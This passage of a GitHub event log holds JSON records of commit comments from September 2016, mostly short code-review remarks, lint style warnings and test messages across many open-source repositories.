-ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/4e30b1371bfbaf11e4294525fdcd2182a7f34038/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-21T09:28:29Z"}
{"id":"4595079233","type":"CommitCommentEvent","actor":{"login":"aiceru"},"repo":{"name":"jam2in/arcus-java-client"},"payload":{"comment":{"id":19110727,"position":9,"line":207,"path":"src/main/java/net/spy/memcached/ArcusKetamaNodeLocator.java","commit_id":"d9e48693f74ae3c5e75a82139b3d8b24f3883cb8","created_at":"2016-09-21T09:28:48Z","updated_at":"2016-09-21T09:28:48Z","body":"compare 는 위코드를 그냥 그대로 베끼다보니... ^^;;; 미안합니다"}},"created_at":"2016-09-21T09:28:48Z"}
{"id":"4595079966","type":"CommitCommentEvent","actor":{"login":"janosharsanyi"},"repo":{"name":"codingmentor/projekt-es-feladatkezelo"},"payload":{"comment":{"id":19110729,"position":15,"line":17,"path":"Project-and-Task Handler/Project-and-Task-Handler-core/Project-and-Task-Handler-core-web/src/main/webapp/protected/user/forum/forum_posts.xhtml","commit_id":"bedca2249fcc1c850b6d252401e0a2aea27e775c","created_at":"2016-09-21T09:28:57Z","updated_at":"2016-09-21T09:28:57Z","body":". "}},"created_at":"2016-09-21T09:28:57Z"}
{"id":"4595082081","type":"CommitCommentEvent","actor":{"login":"janosharsanyi"},"repo":{"name":"codingmentor/projekt-es-feladatkezelo"},"payload":{"comment":{"id":19110736,"position":10,"line":16,"path":"Project-and-Task Handler/Project-and-Task-Handler-core/Project-and-Task-Handler-core-web/src/main/webapp/protected/user/forum/forums.xhtml","commit_id":"bedca2249fcc1c850b6d252401e0a2aea27e775c","created_at":"2016-09-21T09:29:21Z","updated_at":"2016-09-21T09:29:21Z","body":". "}},"created_at":"2016-09-21T09:29:21Z"}
{"id":"4595083545","type":"CommitCommentEvent","actor":{"login":"MinyaHu"},"repo":{"name":"MinyaHu/HelloGit-master"},"payload":{"comment":{"id":19110739,"position":null,"line":null,"path":null,"commit_id":"28942c9a5db62a64bae227bd0ee59c0df38efe5c","created_at":"2016-09-21T09:29:38Z","updated_at":"2016-09-21T09:29:38Z","body":"wqeqwe"}},"created_at":"2016-09-21T09:29:38Z"}
{"id":"4595085197","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19110766,"position":5,"line":89,"path":"app.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-21T09:29:57Z","updated_at":"2016-09-21T09:29:57Z","body":"why 'event' in the name? What does it mean? (code comment)"}},"created_at":"2016-09-21T09:29:57Z"}
{"id":"4595086271","type":"CommitCommentEvent","actor":{"login":"janosharsanyi"},"repo":{"name":"codingmentor/projekt-es-feladatkezelo"},"payload":{"comment":{"id":19110768,"position":5,"line":42,"path":"Project-and-Task Handler/Project-and-Task-Handler-core/Project-and-Task-Handler-core-web/src/main/webapp/registration.xhtml","commit_id":"bedca2249fcc1c850b6d252401e0a2aea27e775c","created_at":"2016-09-21T09:30:10Z","updated_at":"2016-09-21T09:30:10Z","body":"?"}},"created_at":"2016-09-21T09:30:10Z"}
{"id":"4595087217","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19110769,"position":5,"line":402,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"d391639b48e3e3adc3af6c935e7595490ed4025a","created_at":"2016-09-21T09:30:19Z","updated_at":"2016-09-21T09:30:19Z","body":"I didn't say it's wrong; I said I had a hunch."}},"created_at":"2016-09-21T09:30:19Z"}
{"id":"4595087363","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"kevva/exec-buffer"},"payload":{"comment":{"id":19110770,"position":null,"line":null,"path":null,"commit_id":"aa7970884b04ba920740c21b7b4c3fa441d0142f","created_at":"2016-09-21T09:30:21Z","updated_at":"2016-09-21T09:30:21Z","body":"I think `0.4.0` uses `cross-spawn-async` though."}},"created_at":"2016-09-21T09:30:21Z"}
{"id":"4595088104","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19110772,"position":5,"line":402,"path":"plugins/VersionUpgrade/VersionUpgrade21to22/VersionUpgrade21to22.py","commit_id":"d391639b48e3e3adc3af6c935e7595490ed4025a","created_at":"2016-09-21T09:30:29Z","updated_at":"2016-09-21T09:30:29Z","body":"No I didn't"}},"created_at":"2016-09-21T09:30:29Z"}
{"id":"4595088610","type":"CommitCommentEvent","actor":{"login":"Huluti"},"repo":{"name":"AntumDeluge/debreate"},"payload":{"comment":{"id":19110773,"position":6,"line":0,"path":"init.py","commit_id":"752a2a61593e1117fbf707d01b80cad812b160c9","created_at":"2016-09-21T09:30:36Z","updated_at":"2016-09-21T09:30:36Z","body":"Yes there are a lot of \"id\" vars wich is also a built-in type."}},"created_at":"2016-09-21T09:30:36Z"}
{"id":"4595090043","type":"CommitCommentEvent","actor":{"login":"vothanhthoai0053"},"repo":{"name":"vothanhthoai0053/project_1"},"payload":{"comment":{"id":19110777,"position":null,"line":null,"path":null,"commit_id":"ee2c087c7464d2f77b7795748e669e3323a55d46","created_at":"2016-09-21T09:30:52Z","updated_at":"2016-09-21T09:30:52Z","body":"go"}},"created_at":"2016-09-21T09:30:52Z"}
{"id":"4595092006","type":"CommitCommentEvent","actor":{"login":"MiriamShmuelevitz"},"repo":{"name":"shefing/shefing-kb"},"payload":{"comment":{"id":19110784,"position":null,"line":null,"path":null,"commit_id":"96d0de53a3c893292c5bb4d269e71ccfd9c1caf0","created_at":"2016-09-21T09:31:15Z","updated_at":"2016-09-21T09:31:15Z","body":"React-Redux project"}},"created_at":"2016-09-21T09:31:15Z"}
{"id":"4595093797","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19110788,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-21T09:31:37Z","updated_at":"2016-09-21T09:31:37Z","body":"I meant replace `AtomicBoolean` by `boolean`."}},"created_at":"2016-09-21T09:31:37Z"}
{"id":"4595095968","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"kangax/compat-table"},"payload":{"comment":{"id":19110794,"position":null,"line":null,"path":null,"commit_id":"b0e34dc0c096e07ac13e682f029f5046da95493e","created_at":"2016-09-21T09:32:01Z","updated_at":"2016-09-21T09:32:01Z","body":"I'm not seeing it on 55.0.2867.0 on OS X. So it does seem like #790."}},"created_at":"2016-09-21T09:32:01Z"}
{"id":"4595096210","type":"CommitCommentEvent","actor":{"login":"11digitlabs"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19110795,"position":5,"line":89,"path":"app.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-21T09:32:05Z","updated_at":"2016-09-21T09:32:05Z","body":"I wanted to propose this before doing it. I wanted to be able to search easily who is listening on this event. If I just search for timelines I get tons of results, but i search for `eventTimelines` i will get only what is related to that event"}},"created_at":"2016-09-21T09:32:05Z"}
{"id":"4595096518","type":"CommitCommentEvent","actor":{"login":"longpangpang"},"repo":{"name":"longpangpang/longpangpang.github.com"},"payload":{"comment":{"id":19110797,"position":null,"line":null,"path":null,"commit_id":"2e043fa848532a3848fae981a4836bf5d1c5b973","created_at":"2016-09-21T09:32:09Z","updated_at":"2016-09-21T09:32:09Z","body":"删除"}},"created_at":"2016-09-21T09:32:09Z"}
{"id":"4595096531","type":"CommitCommentEvent","actor":{"login":"zhangxm2015"},"repo":{"name":"zhangxm2015/zxm_test01"},"payload":{"comment":{"id":19110798,"position":null,"line":null,"path":null,"commit_id":"0adf530098437bbabcf581cc3089ed47ea22f219","created_at":"2016-09-21T09:32:09Z","updated_at":"2016-09-21T09:32:09Z","body":"测试项目"}},"created_at":"2016-09-21T09:32:09Z"}
{"id":"4595100143","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19110819,"position":9,"line":72,"path":"controller/client.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-21T09:32:51Z","updated_at":"2016-09-21T09:32:51Z","body":"Feedback: please use the same pattern as the other view modules: no init function. If init is better, then the other view functions need to be updated, please open an issue for that."}},"created_at":"2016-09-21T09:32:51Z"}
{"id":"4595100359","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19110822,"position":10,"line":73,"path":"plugins/LegacyProfileReader/LegacyProfileReader.py","commit_id":"48fc9576953c59647b488734dfdc7a5b7c8f012b","created_at":"2016-09-21T09:32:53Z","updated_at":"2016-09-21T09:32:53Z","body":"Won't this show the exception twice in the logs? Better safe than sorry, I guess. (Or is a raised exception not automatically shown in the logs?)"}},"created_at":"2016-09-21T09:32:53Z"}
{"id":"4595100470","type":"CommitCommentEvent","actor":{"login":"longpangpang"},"repo":{"name":"longpangpang/longpangpang.github.com"},"payload":{"comment":{"id":19110823,"position":null,"line":null,"path":null,"commit_id":"2e043fa848532a3848fae981a4836bf5d1c5b973","created_at":"2016-09-21T09:32:54Z","updated_at":"2016-09-21T09:32:54Z","body":"删除"}},"created_at":"2016-09-21T09:32:54Z"}
{"id":"4595105468","type":"CommitCommentEvent","actor":{"login":"longpangpang"},"repo":{"name":"longpangpang/longpangpang.github.com"},"payload":{"comment":{"id":19110837,"position":null,"line":null,"path":null,"commit_id":"2e043fa848532a3848fae981a4836bf5d1c5b973","created_at":"2016-09-21T09:33:55Z","updated_at":"2016-09-21T09:33:55Z","body":"删除"}},"created_at":"2016-09-21T09:33:55Z"}
{"id":"4595105482","type":"CommitCommentEvent","actor":{"login":"kthoms"},"repo":{"name":"kthoms/xtext-core"},"payload":{"comment":{"id":19110838,"position":18,"line":115,"path":"org.eclipse.xtext.xtext.wizard/src/org/eclipse/xtext/xtext/wizard/RuntimeProjectDescriptor.xtend","commit_id":"9d17bc7443c4c85b3fdd681370cdd8e940392a7e","created_at":"2016-09-21T09:33:55Z","updated_at":"2016-09-21T09:33:55Z","body":"Sorry, I do not get how you mean this? Which project?"}},"created_at":"2016-09-21T09:33:55Z"}
{"id":"4595106461","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19110841,"position":null,"line":null,"path":null,"commit_id":"0522e8da0438f1be80fb4a50cc05d626c6b8b9bb","created_at":"2016-09-21T09:34:07Z","updated_at":"2016-09-21T09:34:07Z","body":"- Kernel panic when phone restart bug: (you have fixed, right? I have cherry-picked your commit)\r\n- video recording: aac hw encoding not work: (Maybe a sound drivers mess, I will try to fix it)\r\n- One is vidc drivers: maybe LG stock rom media HAL too old: You have fixed but I have ported some more commits maybe them can solve the problem otherwise I will cherrypick your commit.\r\n- Camera not focus.\r\nlg-devs moved some firmware to /etc/firmware, but stock rom still use /system/media/*.bin: I reverted lg-devs commit so I think it is fixed right?"}},"created_at":"2016-09-21T09:34:07Z"}
{"id":"4595107670","type":"CommitCommentEvent","actor":{"login":"longpangpang"},"repo":{"name":"longpangpang/longpangpang.github.com"},"payload":{"comment":{"id":19110846,"position":null,"line":null,"path":null,"commit_id":"2e043fa848532a3848fae981a4836bf5d1c5b973","created_at":"2016-09-21T09:34:21Z","updated_at":"2016-09-21T09:34:21Z","body":"删除"}},"created_at":"2016-09-21T09:34:21Z"}
{"id":"4595107947","type":"CommitCommentEvent","actor":{"login":"rafuck"},"repo":{"name":"rafuck/DbSimple"},"payload":{"comment":{"id":19110847,"position":null,"line":null,"path":null,"commit_id":"a7e6a74a978701403a00fea0dfcd6e947e390bb2","created_at":"2016-09-21T09:34:24Z","updated_at":"2016-09-21T09:34:24Z","body":"Some of constructions like\r\n```\r\nif (a)\r\n    b();\r\n```\r\nor\r\n```\r\nif (a) b();\r\n```\r\nreplaced by \r\n```\r\nif(a){\r\n    b();\r\n}\r\n```\r\n"}},"created_at":"2016-09-21T09:34:24Z"}
{"id":"4595109170","type":"CommitCommentEvent","actor":{"login":"ExSport"},"repo":{"name":"kodi-czsk/plugin.video.sosac.ph"},"payload":{"comment":{"id":19110851,"position":null,"line":null,"path":null,"commit_id":"224d227be7a3710ae683012389e3f3cb5cb3ed1a","created_at":"2016-09-21T09:34:37Z","updated_at":"2016-09-21T09:34:37Z","body":"@co5mo \r\nTed jsem zkousel full import pustit nekolikrat za sebou a v jednom KODI me to jelo stejne rychle a v druhem to jelo napodruhe vyrazne pomaleji.\r\nNebyl cas to moc testovat, ale vsiml jsem si, ze to ma spojitost se zapnutym scrapovanim. Pokud jsem nemel na slozkach nastavene oc jde a odkud stahovat info (slozka obsahuje filmy/serialy a scrapuje data z local NFO/csfd.cz/tvdb.com/etc...) tak druhy import bezel stejne rychle, ale kdyz jsem toto mel nastavene v jinem KODI, klidne jen at zkousi data brat z LOCAL NFO, tak kdyz to nejak bezelo na pozadi, tak druhy import byl vyrazne pomalejsi.\r\nToto chovani ale pozoruji i se starsimi verzemi pluginu...\r\nMozna @lzoubek ci @lubomir-kucera bude vedet proc tomu tak je (nejaky wait v kodu, kdyz probiha scrapovani, netusim)"}},"created_at":"2016-09-21T09:34:37Z"}
{"id":"4595113682","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":19110865,"position":4,"line":3,"path":"README.md","commit_id":"5d6cc90acbf8268440254ebe55a5a178f9bb4005","created_at":"2016-09-21T09:35:30Z","updated_at":"2016-09-21T09:35:30Z","body":"kind of, though this needs to be re-worded"}},"created_at":"2016-09-21T09:35:30Z"}
{"id":"4595114769","type":"CommitCommentEvent","actor":{"login":"danielgamage"},"repo":{"name":"danielgamage/Extrude-Tool"},"payload":{"comment":{"id":19110868,"position":null,"line":null,"path":null,"commit_id":"ccfa55cd9cf574ff8fa9ab0f9102bc8f5e0ab748","created_at":"2016-09-21T09:35:42Z","updated_at":"2016-09-21T09:35:42Z","body":"this code should be refactored in some more programmatic way lol"}},"created_at":"2016-09-21T09:35:42Z"}
{"id":"4595117142","type":"CommitCommentEvent","actor":{"login":"hessionpi"},"repo":{"name":"hessionpi/Flowlayout"},"payload":{"comment":{"id":19110875,"position":null,"line":null,"path":null,"commit_id":"340fe67a0930a217b1bf0dc2e32e44a07fb0598b","created_at":"2016-09-21T09:36:08Z","updated_at":"2016-09-21T09:36:08Z","body":"参考了开源项目android-flowlayout的作者，在此十分感谢作者！"}},"created_at":"2016-09-21T09:36:08Z"}
{"id":"4595121490","type":"CommitCommentEvent","actor":{"login":"mef"},"repo":{"name":"Mango-information-systems/twitto_be"},"payload":{"comment":{"id":19110884,"position":5,"line":89,"path":"app.js","commit_id":"6da5a84774c3f2aceca5e1fcb16fe2e2d05cf74b","created_at":"2016-09-21T09:36:59Z","updated_at":"2016-09-21T09:36:59Z","body":"How about searching for `.on('timelines'` instead?"}},"created_at":"2016-09-21T09:36:59Z"}
{"id":"4595125781","type":"CommitCommentEvent","actor":{"login":"MinyaHu"},"repo":{"name":"zhangyalei/HelloGit"},"payload":{"comment":{"id":19110898,"position":null,"line":null,"path":null,"commit_id":"a7ae745764f03fd166df347e06edaecfc6d2b942","created_at":"2016-09-21T09:37:50Z","updated_at":"2016-09-21T09:37:50Z","body":"啦啦啦"}},"created_at":"2016-09-21T09:37:50Z"}
{"id":"4595127371","type":"CommitCommentEvent","actor":{"login":"kwadrat"},"repo":{"name":"PyConPL/Book"},"payload":{"comment":{"id":19110904,"position":55,"line":55,"path":"2016/__context__/src/pycon2016/text.tex","commit_id":"572d2a1ed32fab8edb26578557f98dde409395fd","created_at":"2016-09-21T09:38:10Z","updated_at":"2016-09-21T09:38:10Z","body":"Zrobione."}},"created_at":"2016-09-21T09:38:10Z"}
{"id":"4595132865","type":"CommitCommentEvent","actor":{"login":"longpangpang"},"repo":{"name":"longpangpang/longpangpang.github.com"},"payload":{"comment":{"id":19110918,"position":null,"line":null,"path":null,"commit_id":"2e043fa848532a3848fae981a4836bf5d1c5b973","created_at":"2016-09-21T09:39:15Z","updated_at":"2016-09-21T09:39:15Z","body":"删除"}},"created_at":"2016-09-21T09:39:15Z"}
{"id":"4595133058","type":"CommitCommentEvent","actor":{"login":"sonoro1234"},"repo":{"name":"supercollider/hidapi"},"payload":{"comment":{"id":19110919,"position":5,"line":433,"path":"hidapi/hidapi.h","commit_id":"3b30c96d4bb106f13fbdb694820e4028c8c90747","created_at":"2016-09-21T09:39:17Z","updated_at":"2016-09-21T09:39:17Z","body":"being an external library I feel unsure making PRs.\r\nthis:\r\n```\r\n#ifdef WIN32\r\n\t#include<windows.h>\r\n        HANDLE HID_API_EXPORT HID_API_CALL get_device_handle(hid_device *dev);\r\n#endif\r\n```\r\nseems to solve the issue. But my doubt is: where does MSVC get HANDLE definition without adding this?"}},"created_at":"2016-09-21T09:39:17Z"}
{"id":"4595136721","type":"CommitCommentEvent","actor":{"login":"duxiaowei-jd"},"repo":{"name":"iiiii-team/-"},"payload":{"comment":{"id":19110922,"position":null,"line":null,"path":null,"commit_id":"78d0ae572cb120797eb7b9147d074bdb716c6473","created_at":"2016-09-21T09:40:00Z","updated_at":"2016-09-21T09:40:00Z","body":"1、记录事件\r\n\r\n事件分类：\r\n   1、 故障记录\r\n\t\ta.\r\n\t\t\t主机类\r\n\t\t\tsa pe 主机本身的故障\r\n\t\tb.\r\n\t\t\t支付类\r\n\t\t\t支付相关，支付量，成功率等\r\n\t\tc.\r\n\t\t\t网络类\r\n\t\t\t\t网络抖动，网络设备故障。\r\n\t\td.\r\n\t\t\t业务类\r\n\t\t\t\t统一日志，设计业务告警，需要pe和开发\r\n\t\te.  \r\n\t\t\t短信类\r\n\t\te.\r\n\t\t\t其它\r\n\t\t\t\r\n\t\t\t\r\n   2、 硬件保修记录\r\n\t\ta.主机保修\r\n\t\t\r\n\t\tb.其它\r\n\t\t\r\n\t3、报警关闭记录\r\n\t\t1.check—mk告警关闭\r\n\t\t2.其它\r\n\r\n\t\t\r\n\t\t\r\n2、 事件查询：\r\n\t1、 故障查询\r\n\t\ta.查询故障\r\n\t\t\t1.删除故障记录\r\n\t\t\t2.修改历史故障\r\n\t\t\r\n\t\r\n\t2、 报修查询\r\n\t"}},"created_at":"2016-09-21T09:40:00Z"}
{"id":"4595142004","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":19110940,"position":null,"line":null,"path":null,"commit_id":"f54dcd0a13404a757b2c95a55f7f55045669827b","created_at":"2016-09-21T09:41:01Z","updated_at":"2016-09-21T09:41:01Z","body":"fix crash in some case, so please update to this commit\r\nsorry for inconvenience"}},"created_at":"2016-09-21T09:41:01Z"}
{"id":"4595142661","type":"CommitCommentEvent","actor":{"login":"vills"},"repo":{"name":"cloudfs/ftp-cloudfs"},"payload":{"comment":{"id":19110944,"position":7,"line":267,"path":"ftpcloudfs/fs.py","commit_id":"d54bc805c0e750f3b4a5920e1f5a05b788985234","created_at":"2016-09-21T09:41:08Z","updated_at":"2016-09-21T09:41:08Z","body":"`len(data)` never will more that socket buffer size (64Kb usually). And self.split_size is 976Kb minimum.\r\nSo this `if` will never work."}},"created_at":"2016-09-21T09:41:08Z"}
{"id":"4595142999","type":"CommitCommentEvent","actor":{"login":"shale99"},"repo":{"name":"folio-org/raml-module-builder"},"payload":{"comment":{"id":19110945,"position":null,"line":null,"path":null,"commit_id":"8d25f48b37169c212fb8847c6e85fb04f94ff9be","created_at":"2016-09-21T09:41:11Z","updated_at":"2016-09-21T09:41:11Z","body":"Julian - can you commit the spacing fixes?"}},"created_at":"2016-09-21T09:41:11Z"}
{"id":"4595149596","type":"CommitCommentEvent","actor":{"login":"sirkay777"},"repo":{"name":"yaodianmi/Work5Leancloud"},"payload":{"comment":{"id":19110953,"position":null,"line":null,"path":null,"commit_id":"a22c1aba059ba3aae6b56a937b41e26907be75ac","created_at":"2016-09-21T09:42:28Z","updated_at":"2016-09-21T09:42:28Z","body":"👍  for _renderAbout() "}},"created_at":"2016-09-21T09:42:28Z"}
{"id":"4595149940","type":"CommitCommentEvent","actor":{"login":"rfsip"},"repo":{"name":"Show-Me-the-Code/python"},"payload":{"comment":{"id":19110954,"position":21,"line":21,"path":"AK-wang/A0002/permu.cpp","commit_id":"05c4a0e857f3f27bc102c3db8cf44bc01d698d0e","created_at":"2016-09-21T09:42:32Z","updated_at":"2016-09-21T09:42:32Z","body":"cvbf"}},"created_at":"2016-09-21T09:42:32Z"}
{"id":"4595151371","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19110956,"position":null,"line":null,"path":null,"commit_id":"f1be3f53c640ef44c04f516f5a81f6ea96f6e283","created_at":"2016-09-21T09:42:48Z","updated_at":"2016-09-21T09:42:48Z","body":"I'm not sure how this relaes to this patch, but pupmod=3 is a fulll install to a flash drive.\r\nAs stated before, the new init only deals with frugal installs since it is located in initrd.gz."}},"created_at":"2016-09-21T09:42:48Z"}
{"id":"4595157184","type":"CommitCommentEvent","actor":{"login":"Loilo"},"repo":{"name":"terminal42/contao-notification_center"},"payload":{"comment":{"id":19110974,"position":null,"line":null,"path":null,"commit_id":"cca6e9017aead87ec8cf3b8d8bf852f2ea12aa7e","created_at":"2016-09-21T09:43:58Z","updated_at":"2016-09-21T09:43:58Z","body":"Fixes #103 "}},"created_at":"2016-09-21T09:43:58Z"}
{"id":"4595161379","type":"CommitCommentEvent","actor":{"login":"Drein211"},"repo":{"name":"Drein211/test-for-the-personnel-department-prefecture-SZAO"},"payload":{"comment":{"id":19110983,"position":null,"line":null,"path":null,"commit_id":"fbf2fbde3b4a191deb9149707fb7020b5d3f5c8a","created_at":"2016-09-21T09:44:48Z","updated_at":"2016-09-21T09:44:48Z","body":"111"}},"created_at":"2016-09-21T09:44:48Z"}
{"id":"4595164153","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19110994,"position":6,"line":791,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T09:45:22Z","updated_at":"2016-09-21T09:45:22Z","body":"you should comment that the caller is responsible for deleting the string from the heap"}},"created_at":"2016-09-21T09:45:22Z"}
{"id":"4595172542","type":"CommitCommentEvent","actor":{"login":"mpkh"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19111009,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T09:47:02Z","updated_at":"2016-09-21T09:47:02Z","body":"@thankjura да, скомпилируй wayland :) ну или обнови старый патч, который разрешает компилить без wayland, сейчас без него работать не будет..."}},"created_at":"2016-09-21T09:47:02Z"}
{"id":"4595174060","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19111010,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T09:47:20Z","updated_at":"2016-09-21T09:47:20Z","body":"Why not use `basename()` from `libgen.h`? Windows?"}},"created_at":"2016-09-21T09:47:20Z"}
{"id":"4595176268","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19111015,"position":null,"line":null,"path":null,"commit_id":"0f6fa3becfbcd310520bb122ad8bd058ec447f87","created_at":"2016-09-21T09:47:46Z","updated_at":"2016-09-21T09:47:46Z","body":"I don't see the point in having a swapfile if you have a swap partition.\r\nI think of a swapfile as a poor man's swap partition.\r\nThe advantage of a swap partition is that it also works with pupmode=5."}},"created_at":"2016-09-21T09:47:46Z"}
{"id":"4595176564","type":"CommitCommentEvent","actor":{"login":"uttampankajsingh"},"repo":{"name":"jsxgraph/jsxgraph"},"payload":{"comment":{"id":19111016,"position":null,"line":null,"path":null,"commit_id":"11d89a585474b58c23b6182db4e2c5121fd4d77d","created_at":"2016-09-21T09:47:50Z","updated_at":"2016-09-21T09:47:50Z","body":"This issue is fixed for line now. But its still happening for circle and polygon.\r\nFiddle Links,\r\nPolygon: https://jsfiddle.net/uttampankajsingh/tbgnax7u/8/\r\nCircle: https://jsfiddle.net/uttampankajsingh/tbgnax7u/9/\r\n"}},"created_at":"2016-09-21T09:47:50Z"}
{"id":"4595182678","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19111028,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-21T09:49:00Z","updated_at":"2016-09-21T09:49:00Z","body":"I meant a feature request for OKAPI. "}},"created_at":"2016-09-21T09:49:00Z"}
{"id":"4595183444","type":"CommitCommentEvent","actor":{"login":"longpangpang"},"repo":{"name":"longpangpang/longpangpang.github.com"},"payload":{"comment":{"id":19111030,"position":null,"line":null,"path":null,"commit_id":"2e043fa848532a3848fae981a4836bf5d1c5b973","created_at":"2016-09-21T09:49:09Z","updated_at":"2016-09-21T09:49:09Z","body":"删除"}},"created_at":"2016-09-21T09:49:09Z"}
{"id":"4595185914","type":"CommitCommentEvent","actor":{"login":"kvakvs"},"repo":{"name":"garazdawi/otp"},"payload":{"comment":{"id":19111040,"position":19,"line":214,"path":"erts/emulator/beam/erl_gc_sweep.c","commit_id":"16da8c2bc1fb83c5c2158938681af0bf291f9d64","created_at":"2016-09-21T09:49:39Z","updated_at":"2016-09-21T09:49:39Z","body":"erts_next_heap_size is an API function globally used. next_vheap thingy is internal and inlined."}},"created_at":"2016-09-21T09:49:39Z"}
{"id":"4595187197","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19111041,"position":null,"line":null,"path":null,"commit_id":"a2faaffe0c371e67f8c6d219857a352c8dca67a5","created_at":"2016-09-21T09:49:54Z","updated_at":"2016-09-21T09:49:54Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/516/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2076)."}},"created_at":"2016-09-21T09:49:54Z"}
{"id":"4595187547","type":"CommitCommentEvent","actor":{"login":"astec"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19111044,"position":39,"line":1060,"path":"modules/@angular/forms/test/reactive_integration_spec.ts","commit_id":"212f8dbde7039c2dd76aa75ee38316aad29e9d33","created_at":"2016-09-21T09:49:57Z","updated_at":"2016-09-21T09:49:57Z","body":"@kara, It should be possible to have some of few radio items with the same name disabled. Consider this (_you can select meat or chicken but the fish option is disabled_):\r\n```\r\n<input type=radio name=food value=meat > Meat\r\n<input type=radio name=food value=chicken > Chicken\r\n<input type=radio name=food value=fish disabled > Fish\r\n```\r\n\r\nThen having a form:\r\n```\r\n     <form>\r\n        <input type=\"radio\" name=\"food\" [(ngModel)]=\"food\" value=\"chicken\">\r\n        <input type=\"radio\" name=\"food\"  [(ngModel)]=\"food\" value=\"fish\">\r\n```\r\nthis check seems to be invalid:\r\n```\r\n+          expect(inputs[0].nativeElement.disabled).toEqual(true);\r\n+          expect(inputs[1].nativeElement.disabled).toEqual(true);\r\n```\r\nShould be:\r\n```\r\n+          expect(inputs[0].nativeElement.disabled).toEqual(false);\r\n+          expect(inputs[1].nativeElement.disabled).toEqual(true);\r\n```"}},"created_at":"2016-09-21T09:49:57Z"}
{"id":"4595188188","type":"CommitCommentEvent","actor":{"login":"Z-JaDe"},"repo":{"name":"Z-JaDe/Hosts"},"payload":{"comment":{"id":19111048,"position":null,"line":null,"path":null,"commit_id":"3fa732acfa358de123cb00ac878b7184737870de","created_at":"2016-09-21T09:50:06Z","updated_at":"2016-09-21T09:50:06Z","body":"host"}},"created_at":"2016-09-21T09:50:06Z"}
